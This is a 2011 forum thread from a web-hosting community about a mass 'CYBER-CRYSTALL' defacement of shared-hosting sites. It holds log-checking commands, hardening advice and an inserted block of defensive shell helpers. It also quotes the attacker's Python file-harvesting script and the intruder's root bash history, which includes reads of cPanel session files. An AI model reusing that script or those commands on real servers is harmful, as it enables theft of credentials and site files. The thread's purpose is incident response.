
12-06-2011, 04:18 PM
WHT Addict
Join Date: Mar 2011
Location: florida
Posts: 155
A number of websites on my shared hosting have been hacked and replaced with 1 page, and files were added: index.htm, index.php, index.html.
The page will say Hacked by CYBER-CRYSTALL.
I googled and have noticed thousands of sites are currently being attacked this way.
My question is: what security can I do to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?

12-07-2011, 05:34 AM
Web Hosting Evangelist
Join Date: Mar 2011
Location: Edinburgh, UK
Posts: 475
Someone has managed to upload files to your webserver directory. What OS and webserver are you using? Check your webserver logs to see how the files were added.

12-07-2011, 05:48 AM
Web Hosting Master
Join Date: Jun 2007
Posts: 911
Indeed, you should check the server logs. Also update the script you are using (WordPress etc.) to the latest version.

12-09-2011, 09:09 AM
WHT Addict
Join Date: Jul 2011
Location: Sittingbourne, Kent, UK
Posts: 165
Check server access logs for successful logins:
last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp
Once done, check for hidden dirs:
updatedb
locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."
Assuming you find nothing suspicious here, start checking access logs and such for suspicious items; ensure you check for rootkits also.
I'm afraid it's more likely that your personal computer has been exploited and an FTP client that saves passwords in clear text has allowed these details to be compromised.
Failing this, check the server for possible exploits / out-of-date software.
Good luck with your search; I hope you keep us up to date.
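The login-log and hidden-directory checks in the post above, as an added example that is not part of the thread: a small POSIX shell helper set that lists dot-and-space directory names of the kind the locate commands target, pulls accepted SSH logins out of a secure log, and sweeps every account's public_html for the defacement index files. The sample tree, account names and log lines it builds are constructed for illustration.

```shell
#!/bin/sh
# Added triage helpers for the checks in the post above; not code from the
# thread. All input is a constructed sample built by setup_sample, so it runs
# offline. Paths, account names and log lines are assumptions for illustration.

# Print every entry under DIR whose name is made only of dots and spaces
# ("...", ".. ", " ." and the like), the hiding trick the locate commands look for.
find_odd_names() {
    find "$1" -mindepth 1 | awk -F/ '$NF ~ /^[. ]+$/'
}

# Print "user ip" for each successful SSH login recorded in LOGFILE
# (the sshd "Accepted ..." lines the grep in the post picks out).
accepted_logins() {
    awk '/sshd\[[0-9]+\]: Accepted / {
        for (i = 1; i <= NF; i++) {
            if ($i == "for") user = $(i + 1)
            if ($i == "from") ip = $(i + 1)
        }
        print user, ip
    }' "$1"
}

# Print index.htm/index.html/index.php files under DOCROOT that carry the
# defacement banner, so every account's public_html is swept in one pass.
find_defaced() {
    find "$1" -type f \( -name index.htm -o -name index.html -o -name index.php \) \
        -exec grep -l 'Hacked by' {} +
}

# Build the constructed sample (two hidden dirs, two defaced files, a small
# secure log) in a temp dir and print its path.
setup_sample() {
    sample_dir=$(mktemp -d)
    mkdir -p "$sample_dir/home/acct1/public_html/..." \
             "$sample_dir/home/acct2/public_html/.. " \
             "$sample_dir/home/acct2/public_html/css"
    printf '<html>Hacked by CYBER-CRYSTALL</html>\n' > "$sample_dir/home/acct1/public_html/index.htm"
    printf '<?php echo "Hacked by CYBER-CRYSTALL"; ?>\n' > "$sample_dir/home/acct1/public_html/index.php"
    printf '<html>welcome</html>\n' > "$sample_dir/home/acct2/public_html/index.html"
    cat > "$sample_dir/secure" <<'EOF'
Dec  9 03:12:01 host sshd[2211]: Accepted password for root from 203.0.113.45 port 51234 ssh2
Dec  9 03:15:44 host sshd[2230]: Failed password for root from 203.0.113.45 port 51300 ssh2
Dec  9 04:01:10 host sshd[2301]: Accepted publickey for admin from 198.51.100.7 port 40022 ssh2
EOF
    echo "$sample_dir"
}
```

To try it against the sample, run `d=$(setup_sample); find_odd_names "$d"; accepted_logins "$d/secure"; find_defaced "$d/home"`; on a real box point the functions at /home and /var/log/secure instead.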

12-09-2011, 10:56 AM
Disabled
Join Date: Nov 2011
Location: Egypt
Posts: 16
Check scripts on your sites that allow uploading malicious files.
I think this hacker can't do anything except add his index files only, not SQL injection or others,
so I recommend securing your server with the CSF firewall and mod_security.

12-09-2011, 11:07 AM
Lord of live chats
Join Date: Jul 2009
Location: UK
Posts: 1,221
My first port of call would be to look at the FTP logs if a lot of people have been done the same way.
My second look would be at any kind of 3rd-party scripts that a lot of other people may use (WordPress, mailer scripts, monitoring scripts, etc.).
It's evidently a generic hack that a lot of people are vulnerable to.

12-09-2011, 09:45 PM
Newbie
Join Date: Jul 2010
Location: Salt Lake City, Utah
Posts: 5
A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).
Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.
Please let me know if you find anything I've missed!
Last edited by ioTerrence; 12-09-2011 at 09:48 PM.
Reason: Corrected host's url.

12-09-2011, 09:51 PM
Junior Guru Wannabe
Join Date: Jan 2004
Location: Texas
Posts: 73
Quote:
Originally Posted by Dig1
A number of websites on my shared hosting have been hacked and replaced with 1 page, and files were added: index.htm, index.php, index.html.
The page will say Hacked by CYBER-CRYSTALL.
I googled and have noticed thousands of sites are currently being attacked this way.
My question is: what security can I do to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?
Holy cow. A google search renders hundreds of hacked sites. Looks like someone needs to get a life.

12-09-2011, 10:03 PM
Newbie
Join Date: Jul 2010
Location: Salt Lake City, Utah
Posts: 5
Also came across this code floating around online, thanks to the email address they left behind. I don't know anything about Python, but if I'm interpreting it right, part of it is some kind of URL fetcher?
#!/usr/bin/python
# mekad By Cyber-Crystal
#
# Cyb3r.Crystal@Gmail.com
# tryag.cc
import urllib2,re
# prompt for a URL, fetch that page and collect every href target on it
raw = raw_input('URL CONF : ')
url = urllib2.urlopen(raw)
data = url.read()
finddata = re.findall('href="(.*?)">',data)
# for each link, download it from the same base URL and append the body to a
# local file with the same name
for cyb3r in range(len(finddata)):
    try:
        filecon = open(finddata[cyb3r],'a')
        done = urllib2.urlopen(raw+finddata[cyb3r])
        wewe = done.read()
        print "Witteng ....\n"
        filecon.write(wewe)
        print "Done "
    except IOError:
        print "error"

12-11-2011, 12:31 PM
WHT Addict
Join Date: Mar 2011
Location: florida
Posts: 155
Yes, and in /etc/httpd/conf they also added 5 files named 1.pl, 2.pl, 3.pl, etc.
So I figured they had to have accessed root some way and did this and added the files.
In root's bash history >
ls -l /etc/valiases
cd /etc/valiases
ls -la /etc/valiases
ls -la /etc/valiases/
cd /usr/loca/apache
cd /etc/httpd/conf
cat httpd.conf | grep DocumentRoot
nano 1.pl
pico 1.pl
nano 1.pl
yum install nano
nano 1.pl
perl 1.pl
nano 2.pl
perl 2.pl
nano 3.pl
perl 3.pl
ifconfig
nano 4.pl
perl 4.pl
exit
pdw
pwd
ls
locate index.html
cd /var/www
ls
cd html
ls
cd ..
cd /usr/local/apache
cd /usr/local
ls
cd /etc/httpds
cd /etc/httpd
ls
cd conf
cat httpd.conf | grep DocumentRoot
cat /var/cpanel
cat * /var/cpanel/sessions
dec6find /home*/*/public_html -type l
........
So instead of looking for any more compromised files I reinstalled the OS and added server security hardening like >
rkhunter, DenyHosts, fail2ban, mod_security, AIDE (Advanced Intrusion Detection Environment), and locked down the httpd config (file indexing) and / access. Also made root nologin except by su through a special user with a password of 16 characters, numbers and punctuation; also tightened PHP and MySQL security.
I reloaded all customers' websites from backup and all is well for now.
My iptables have grown quite a bit;
a few country bans were auto-added and DenyHosts has added to the deny hosts file also.
I am a little more confident now!

12-11-2011, 12:36 PM
Lord of live chats
Join Date: Jul 2009
Location: UK
Posts: 1,221
Quote:
Originally Posted by Dig1
So instead of looking for any more compromised files I reinstalled the OS and added server security hardening
Probably the best thing.
- You have identified what's going on and what level of compromise you have had.
- You have taken the best action possible and re-installed, now knowing what to look out for.
If only everyone followed the same method. I see too many posts about people "fixing" a hacked server and leaving it running.

12-11-2011, 02:15 PM
WHT Addict
Join Date: Mar 2011
Location: florida
Posts: 155

12-12-2011, 06:25 AM
Web Hosting Master
Join Date: May 2010
Posts: 643
Quote:
Originally Posted by Dig1
A number of websites on my shared hosting have been hacked and replaced with 1 page, and files were added: index.htm, index.php, index.html.
The page will say Hacked by CYBER-CRYSTALL.
I googled and have noticed thousands of sites are currently being attacked this way.
My question is: what security can I do to prevent this hack, and where did I miss securing my host/websites from these kinds of attacks?
If only a number of sites have been hacked, it could be due to insecure versions of software. If it was all of the sites, I'm sorry to say but you have been rooted.
- Ashton

12-12-2011, 07:26 PM
Junior Guru
Join Date: Apr 2008
Location: UK
Posts: 231
If he can switch directories and read files, your server is not set up properly, and just installing the server software you mentioned may not even be enough; it all has to be configured correctly to be effective.
And btw, this certainly looks like a real skid.

12-12-2011, 07:36 PM
Urban Legend
Join Date: Feb 2006
Location: Global
Posts: 1,287
Quote:
Originally Posted by ioTerrence
A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the other one; it was in the root dir).
Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.
Please let me know if you find anything I've missed!
I liked that song.